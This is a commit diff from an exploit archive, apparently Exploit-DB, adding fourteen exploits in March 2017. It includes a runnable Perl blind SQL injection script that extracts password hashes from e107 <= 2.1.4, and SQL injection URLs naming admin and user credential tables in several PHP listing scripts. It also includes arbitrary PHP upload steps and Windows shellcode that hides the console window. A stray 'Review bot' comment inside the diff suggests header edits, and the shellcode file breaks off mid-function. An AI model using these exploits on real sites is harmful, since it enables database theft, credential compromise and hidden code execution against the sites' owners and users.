DB: 2017-03-12
14 new exploits MobaXterm Personal Edition 9.4 - Directory Traversal Windows x86 - Hide Console Window Shellcode (182 bytes) e107 <= 2.1.4 - 'keyword' Blind SQL Injection Domain Marketplace Script - SQL Injection Global In - SQL Injection Global In - Arbitrary File Upload Vanelo - SQL Injection Mirage - SQL Injection Pet Listing Script 3.0 - SQL Injection Property Listing Script 3.1 - SQL Injection Travel Tours Script 2.0 - SQL Injection Yacht Listing Script 2.0 - SQL Injection Yellow Pages Script 3.2 - 'category_id' Parameter SQL Injection PHP Forum Script 3.0 - SQL Injection
parent
f2327bc214
commit
d36dc6b95d
15 changed files with 736 additions and 0 deletions
14
files.csv
|
@ -15313,6 +15313,7 @@ id,file,description,date,author,platform,type,port
|
|||
41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
|
||||
41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0
|
||||
41545,platforms/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Buffer Overflow",2017-03-07,"Peter Baris",windows,remote,0
|
||||
41592,platforms/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,windows,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -15938,6 +15939,7 @@ id,file,description,date,author,platform,type,port
|
|||
41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -37493,3 +37495,15 @@ id,file,description,date,author,platform,type,port
|
|||
41577,platforms/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps,0
|
||||
41579,platforms/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps,0
|
||||
41578,platforms/cgi/webapps/41578.txt,"dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting",2017-03-10,"Shorebreak Security",cgi,webapps,0
|
||||
41580,platforms/php/webapps/41580.pl,"e107 <= 2.1.4 - 'keyword' Blind SQL Injection",2017-03-09,StAkeR,php,webapps,0
|
||||
41582,platforms/php/webapps/41582.txt,"Domain Marketplace Script - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41583,platforms/php/webapps/41583.txt,"Global In - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41584,platforms/php/webapps/41584.txt,"Global In - Arbitrary File Upload",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41585,platforms/php/webapps/41585.txt,"Vanelo - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41593,platforms/php/webapps/41593.txt,"Mirage - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41586,platforms/php/webapps/41586.txt,"Pet Listing Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41587,platforms/php/webapps/41587.txt,"Property Listing Script 3.1 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41588,platforms/php/webapps/41588.txt,"Travel Tours Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41589,platforms/php/webapps/41589.txt,"Yacht Listing Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41590,platforms/php/webapps/41590.txt,"Yellow Pages Script 3.2 - 'category_id' Parameter SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
41591,platforms/php/webapps/41591.txt,"PHP Forum Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
|
||||
|
|
|
265
platforms/php/webapps/41580.pl
Executable file
|
@ -0,0 +1,265 @@
|
|||
#!/usr/bin/perl
|
||||
#
|
||||
#
|
||||
# e107 <= 2.1.4 "keyword" Blind SQL Injection Exploit
|
||||
#
|
||||
# --------------------------------------------------------------------------
|
||||
# [*] Discovered by staker - staker[at]hotmail[dot]it
|
||||
# [*] Discovered on 09/03/2017
|
||||
# [*] Site Vendor: http://www.e107.org
|
||||
# [*] BUG: Blind SQL Injection
|
||||
# --------------------------------------------------------------------------
|
||||
#
|
||||
#
|
||||
# Description
|
||||
# -------------------------------------------------------------------------
|
||||
# e107 contains one flaw that allows an attacker to carry out an SQL
|
||||
# injection attack. The issue is due to the "e107_plugins/pm/pm.php" script
|
||||
# not properly saniting user-supplied input to the "keyword" POST variable
|
||||
# This may allow an attacker to inject or manipulate sql queries in
|
||||
# the backend database regardless of php.ini settings
|
||||
# -------------------------------------------------------------------------
|
||||
# SHORT EXPLANATION
|
||||
# -----------------------------------
|
||||
#
|
||||
# FILE: "e107_handlers/core_functions.php"
|
||||
#
|
||||
# 76. function vartrue(&$val, $default='')
|
||||
# 77. {
|
||||
# 78. if (isset($val) && $val) { return $val; } {1} <--- variable is not sanized to be sent at the mysql database
|
||||
# 79. return $default;
|
||||
# 80.}
|
||||
#
|
||||
# ----------------------------------
|
||||
#
|
||||
# FILE: "e107/e107_plugins/pm/pm.php"
|
||||
#
|
||||
#
|
||||
# 35. if(vartrue($_POST['keyword'])) {2}<--- if $_POST keyword variable is set, then e107 starts pm_user_lookup() function.
|
||||
# 36. {
|
||||
# 37. pm_user_lookup();
|
||||
# 38.}
|
||||
#
|
||||
#
|
||||
#
|
||||
# 615. function pm_user_lookup()
|
||||
# 616. {
|
||||
# 617. $sql = e107::getDb();
|
||||
# 618.
|
||||
# 619. $query = "SELECT * FROM #user WHERE user_name REGEXP '^".$_POST['keyword']."' "; {3} <---- variable not sanized
|
||||
# 620. if($sql->gen($query))
|
||||
# 621. {
|
||||
# 622. echo '[';
|
||||
# 623 while($row = $sql->fetch())
|
||||
# 624. {
|
||||
# 625. $u[] = "{\"caption\":\"".$row['user_name']."\",\"value\":".$row['user_id']."}";
|
||||
# 626. }
|
||||
# 627.
|
||||
# 628. echo implode(",",$u);
|
||||
# 629. echo ']';
|
||||
# -----------------------------------
|
||||
#
|
||||
#
|
||||
# use your brain..
|
||||
#
|
||||
# Greetz to: Warwolfz Crew,
|
||||
# meh, Dante90, SHADES MASTER and nexen
|
||||
#
|
||||
# -- 0gay --
|
||||
#
|
||||
# -----------------------------------
|
||||
# YOUR MOM IS NOT SAFE ANYMORE!!
|
||||
# CALL HER!!
|
||||
# -----------------------------------
|
||||
|
||||
|
||||
|
||||
use strict;
|
||||
use IO::Socket::INET;
|
||||
use LWP::UserAgent;
|
||||
|
||||
|
||||
|
||||
|
||||
my ($URL,$uid) = @ARGV;
|
||||
my @chars = (8..122);
|
||||
my ($i,$ord,$hash) = (1,undef,undef);
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
if (@ARGV != 2) { usage(); }
|
||||
|
||||
|
||||
$URL = parse::URL($URL);
|
||||
|
||||
|
||||
syswrite (STDOUT,"[-] Crypted Password: ");
|
||||
|
||||
|
||||
for ($i=0;$i<=60;$i++)
|
||||
{
|
||||
|
||||
foreach $ord (@chars)
|
||||
{
|
||||
|
||||
if (e107::Query(sql($i,$ord),$URL) == 666 )
|
||||
{
|
||||
syswrite (STDOUT,chr($ord));
|
||||
$hash .= chr($ord);
|
||||
last;
|
||||
}
|
||||
if ($i == 2 and not defined $hash)
|
||||
{
|
||||
syswrite (STDOUT,"\n[-] Exploit Failed");
|
||||
exit;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
if (length($hash) == 60) {
|
||||
die "\[-]Exploit Successfully";
|
||||
}
|
||||
else {
|
||||
die "\n[-] Exploit Failed";
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
sub e107::Query
|
||||
{
|
||||
|
||||
# 1st parameter, sql query
|
||||
# 2nd parameter, e107 website
|
||||
|
||||
my ($query,$URL) = @_;
|
||||
my $response = undef;
|
||||
|
||||
my $lwp = new LWP::UserAgent;
|
||||
|
||||
|
||||
$lwp->default_header('User-Agent' => 'Lynx (textmode)');
|
||||
|
||||
$response = $lwp->post($URL."/pm/",
|
||||
[
|
||||
keyword => $query
|
||||
]) or die $!;
|
||||
|
||||
|
||||
if ($response->content =~ /caption/) {
|
||||
return 666;
|
||||
}
|
||||
else {
|
||||
return 0;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
|
||||
sub parse::URL
|
||||
{
|
||||
my $string = shift @_ || die($!);
|
||||
|
||||
if ($string !~ /^http:\/\/?/i) {
|
||||
$string = 'http://'.$string;
|
||||
}
|
||||
|
||||
return $string;
|
||||
}
|
||||
|
||||
|
||||
|
||||
sub sql
|
||||
{
|
||||
|
||||
# 1st parameter, an e107's userid
|
||||
# 2nd parameter substring number
|
||||
# 3rd parameter charcode number
|
||||
|
||||
my ($i,$j,$sql) = (shift,shift,undef);
|
||||
|
||||
$sql = "' AND ASCII(SUBSTRING((SELECT user_password FROM e107_user WHERE user_id=".$uid."),".$i.",1))=".$j."#";
|
||||
|
||||
return $sql;
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
sub e107::Cookies
|
||||
{
|
||||
|
||||
my ($username,$password) = @_;
|
||||
my ($packet,$content);
|
||||
|
||||
my $host = "127.0.0.1"; # Valid Host (insert it manually)
|
||||
my $path = "/e107/"; # Valid e107 path (insert it manually)
|
||||
|
||||
|
||||
my $data = "username=",$username."&userpass=".$password."&userlogin=Sign+In";
|
||||
|
||||
|
||||
my $socket = new IO::Socket::INET(
|
||||
PeerAddr => $host,
|
||||
PeerPort => 80,
|
||||
Proto => 'tcp',
|
||||
) or die $!;
|
||||
|
||||
|
||||
|
||||
$packet .= "POST ".$path."/login.php HTTP/1.1\r\n";
|
||||
$packet .= "Host: ".$host."\r\n";
|
||||
$packet .= "User-Agent: Lynx (textmode)\r\n";
|
||||
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
|
||||
$packet .= "Content-Length:".length($data)."\r\n";
|
||||
$packet .= "Connection: close\r\n\r\n";
|
||||
$packet.= $data;
|
||||
|
||||
|
||||
$socket->send($packet);
|
||||
|
||||
while (<$socket>) {
|
||||
$content .= $_;
|
||||
}
|
||||
|
||||
|
||||
if ($content =~ /Set-Cookie: (.+?)/) {
|
||||
return $1;
|
||||
}
|
||||
else {
|
||||
die("[-] Login Failed..\n");
|
||||
}
|
||||
|
||||
|
||||
# This function is useful to log-in and retrieves your cookies, but you don't need it for this exploit.
|
||||
# it works without log-in, but if you got some trouble, try to use this one.
|
||||
|
||||
# e107::Login('YOUR USERNAME','YOUR PASSWORD');
|
||||
}
|
||||
|
||||
|
||||
sub usage() {
|
||||
|
||||
print "[*---------------------------------------------------------*]\n".
|
||||
"[* e107 <= 2.1.4 'keyword' Blind SQL Injection Exploit *]\n".
|
||||
"[*---------------------------------------------------------*]\n".
|
||||
"[* Usage: perl web.pl [host] [uid] *]\n".
|
||||
"[* *]\n".
|
||||
"[* Options: *]\n".
|
||||
"[* [host] insert a valid host *]\n".
|
||||
"[* [uid] insert a userid *]\n".
|
||||
"[*---------------------------------------------------------*]\n";
|
||||
exit;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
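Review bot: The annotated source in the header comment marks `vartrue()` (`# 78. if (isset($val) && $val) { return $val; } {1} <--- variable is not sanized ...`) as the place where input is "not sanized", but that helper only tests truthiness and was never a sanitizer; the injection point the analysis actually shows is the string-built query in `pm_user_lookup()` (`# 619. $query = "SELECT * FROM #user WHERE user_name REGEXP '^".$_POST['keyword']."' ";`). Suggest rewording the `{1}` annotation to say that no escaping happens anywhere on the path from `$_POST['keyword']` to the query, and adding one line to the Description naming the remediation: run the value through the e107 DB layer's escaping helper or a prepared statement before it reaches `REGEXP`. The header also states only `e107 <= 2.1.4` with no fixed-version line, so a reader cannot tell whether a later release resolves it; state that explicitly, e.g. `# [*] Fixed in: unknown at time of writing`. "sanized"/"saniting" should read "sanitized"/"sanitizing" in both the Description and the annotations.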
26
platforms/php/webapps/41582.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
# # # # #
|
||||
# Exploit Title: Domain Marketplace Script - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: http://scripteen.com/
|
||||
# Software: http://scripteen.com/item/scripts/scripteen-domain-marketplace-script.html
|
||||
# Demo: http://dwm.domainauctionsscript.com/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?page=websites_for_sale&cat=[SQL]
|
||||
# users :userId
|
||||
# users :data
|
||||
# users :payment_date
|
||||
# users :expiration_date
|
||||
# users :username
|
||||
# users :password
|
||||
# users :nume
|
||||
# users :adresa
|
||||
# Etc..
|
||||
# # # # #
|
26
platforms/php/webapps/41583.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
# # # # #
|
||||
# Exploit Title: Global In – A LinkedIn Clone - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.techbizstudio.com/
|
||||
# Software: https://www.techbizstudio.com/product/linkedin-clone/
|
||||
# Demo: https://www.techbizstudio.com/demo/globalin/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/hsearch?accept=true&fnm=[SQL]&lnm=[SQL]
|
||||
# http://localhost/[PATH]/search?type=company&key=[SQL] [Login as regular user]
|
||||
# http://localhost/[PATH]/search?type=people&key=[SQL]&fnm=[SQL]&lnm=[SQL]&title=[SQL]&com=[SQL]&sc=[SQL]&co=[SQL]&industry=[SQL] [Login as regular user]
|
||||
# tb_admin :id
|
||||
# tb_admin :username
|
||||
# tb_admin :email
|
||||
# tb_admin :password
|
||||
# tb_admin :ip_address
|
||||
# tb_admin :is_active
|
||||
# Etc..
|
||||
# # # # #
|
21
platforms/php/webapps/41584.txt
Executable file
|
@ -0,0 +1,21 @@
|
|||
# # # # #
|
||||
# Exploit Title: Global In - Arbitrary File Upload
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.techbizstudio.com/
|
||||
# Software: https://www.techbizstudio.com/product/linkedin-clone/
|
||||
# Demo: https://www.techbizstudio.com/demo/globalin/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# Exploit :
|
||||
# Login as regular user
|
||||
# http://localhost/[PATH]/dashboard
|
||||
# Upload Photo / File.php
|
||||
# http://localhost/[PATH]/post-images/1113330455_File.php
|
||||
# Etc..
|
||||
# # # # #
|
19
platforms/php/webapps/41585.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Vanelo – Wanelo Clone - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.zoplay.com/
|
||||
# Software: https://www.zoplay.com/web/trending-marketplace-website/
|
||||
# Demo: http://wanelo.zoplay.com/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/shopby/IhsanSencan?q=[SQL]
|
||||
# Duplicate entry 'waneloclone
|
||||
# Etc..
|
||||
# # # # #
|
18
platforms/php/webapps/41586.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Pet Listing Script v3.0 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.phpjabbers.com/
|
||||
# Software: https://www.phpjabbers.com/pet-listing-script/
|
||||
# Demo: http://demo.phpjabbers.com/index.php?demo=petls&front=1&lid=1
|
||||
# Version: 3.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&listing_search=1&year_from=2017[SQL]&year_to=2017[SQL]
|
||||
# Etc..
|
||||
# # # # #
|
18
platforms/php/webapps/41587.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Property Listing Script v3.1 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.phpjabbers.com/
|
||||
# Software: https://www.phpjabbers.com/property-listing-script/
|
||||
# Demo: http://demo.phpjabbers.com/index.php?demo=pls&front=1&lid=1
|
||||
# Version: 3.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1[SQL]&max_bedrooms=1[SQL]&min_bathrooms=1[SQL]&max_bathrooms=2[SQL]
|
||||
# Etc..
|
||||
# # # # #
|
18
platforms/php/webapps/41588.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Travel Tours Script v2.0 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.phpjabbers.com/
|
||||
# Software: https://www.phpjabbers.com/travel-tours-script/
|
||||
# Demo: http://demo.phpjabbers.com/index.php?demo=vpl&front=1&lid=1
|
||||
# Version: 2.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&sortby=stars&direction=[SQL]&listing_search=1&type=[SQL]&rating_from=[SQL]&rating_to=[SQL]&price_from=[SQL]&price_to=[SQL]
|
||||
# Etc..
|
||||
# # # # #
|
18
platforms/php/webapps/41589.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Yacht Listing Script v2.0 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.phpjabbers.com/
|
||||
# Software: https://www.phpjabbers.com/yacht-listing-script/
|
||||
# Demo: http://demo.phpjabbers.com/index.php?demo=yls&front=1&lid=1
|
||||
# Version: 2.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&listing_search=1&min_year=1948[SQL]&max_year=2017[SQL]&min_loa=6[SQL]&max_loa=20[SQL]&min_length=25[SQL]&max_length=150[SQL]&min_beam=20[SQL]&max_beam=150[SQL]
|
||||
# Etc..
|
||||
# # # # #
|
18
platforms/php/webapps/41590.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Yellow Pages Script v3.2 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.phpjabbers.com/
|
||||
# Software: https://www.phpjabbers.com/yellow-pages-script/
|
||||
# Demo: http://demo.phpjabbers.com/index.php?demo=yps&front=1&lid=1
|
||||
# Version: 3.2
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&category_id=[SQL]
|
||||
# Etc..
|
||||
# # # # #
|
18
platforms/php/webapps/41591.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: PHP Forum Script v3.0 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.phpjabbers.com/
|
||||
# Software: https://www.phpjabbers.com/php-forum-script/
|
||||
# Demo: http://demo.phpjabbers.com/index.php?demo=pfs&front=1&lid=1
|
||||
# Version: 3.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&column=[SQL]created&direction=DESC
|
||||
# Etc..
|
||||
# # # # #
|
19
platforms/php/webapps/41593.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Mirage – Fancy Clone - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 11.03.2017
|
||||
# Vendor Homepage: https://www.zoplay.com/
|
||||
# Software: https://www.zoplay.com/web/multi-vendor-clone-website/
|
||||
# Demo: http://fancyclone.zoplay.com/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail: ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/shopby/IhsanSencan?c=[SQL]
|
||||
# Duplicate entry 'fancyclone
|
||||
# Etc..
|
||||
# # # # #
|
113
platforms/win_x86/shellcode/41581.c
Executable file
|
@ -0,0 +1,113 @@
|
|||
/*
|
||||
|
||||
MIT License
|
||||
|
||||
Copyright (c) 2017 Ege Balcı
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in all
|
||||
copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||
SOFTWARE.
|
||||
|
||||
|
||||
|
||||
# Win32 - Hide Console Window Shellcode (182 BYTES)
|
||||
# Date: [11.03.2017]
|
||||
# Author: [Ege Balcı]
|
||||
# Tested on: [Win XP/Vista/7/8/8.1/10]
|
||||
|
||||
@egeblc
|
||||
|
||||
------------------------------------------------------------------
|
||||
|
||||
This shellcode will hide the console window...
|
||||
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
|
||||
pushad ; Save all register to stack
|
||||
pushfd ; Save all flags to stack
|
||||
cld
|
||||
call Start
|
||||
%include "API-BLOCK.asm"; Stephen Fewer's hash API from metasploit project
|
||||
|
||||
Start:
|
||||
pop ebp ; Pop the address of SFHA
|
||||
|
||||
push 0x00000000 ; Push the byte 'user32' ,0,0
|
||||
push 0x00003233 ; ...
|
||||
push 0x72657375 ; ...
|
||||
push esp ; Push a pointer to the "user32" string on the stack.
|
||||
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
|
||||
call ebp ; LoadLibraryA( "user32" )
|
||||
add esp,0x0C ; Clear the stack
|
||||
|
||||
push 0xCE726E89 ; hash("user32.dll", "GetConsoleWindow")
|
||||
call ebp ; GetConsoleWindow();
|
||||
|
||||
push 0x00000000 ; 0
|
||||
push eax ; Console window handle
|
||||
push 0x6E2EEBC2 ; hash(User32.dll, ShowWindow)
|
||||
call ebp ; ShowWindow(HANDLE,SW_HIDE);
|
||||
|
||||
popfd ; Pop back all saved flags
|
||||
popad ; Pop back all saved registers
|
||||
ret ; Return
|
||||
|
||||
*/
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
|
||||
unsigned char Shellcode[] = {
|
||||
0x60, 0x9c, 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31,
|
||||
0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b,
|
||||
0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c, 0x61, 0x7c,
|
||||
0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52, 0x57,
|
||||
0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48,
|
||||
0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3,
|
||||
0x3a, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf,
|
||||
0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8, 0x3b, 0x7d,
|
||||
0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c,
|
||||
0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89,
|
||||
0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f,
|
||||
0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x6a, 0x00, 0x68, 0x33, 0x32,
|
||||
0x00, 0x00, 0x68, 0x75, 0x73, 0x65, 0x72, 0x54, 0x68, 0x4c, 0x77, 0x26,
|
||||
0x07, 0xff, 0xd5, 0x83, 0xc4, 0x0c, 0x68, 0x89, 0x6e, 0x72, 0xce, 0xff,
|
||||
0xd5, 0x6a, 0x00, 0x50, 0x68, 0xc2, 0xeb, 0x2e, 0x6e, 0xff, 0xd5, 0x9d,
|
||||
0x61, 0xc3
|
||||
};
|
||||
|
||||
|
||||
|
||||
void ExecuteShellcode();
|
||||
|
||||
|
||||
int main(int argc, char const *argv[])
|
||||
{
|
||||
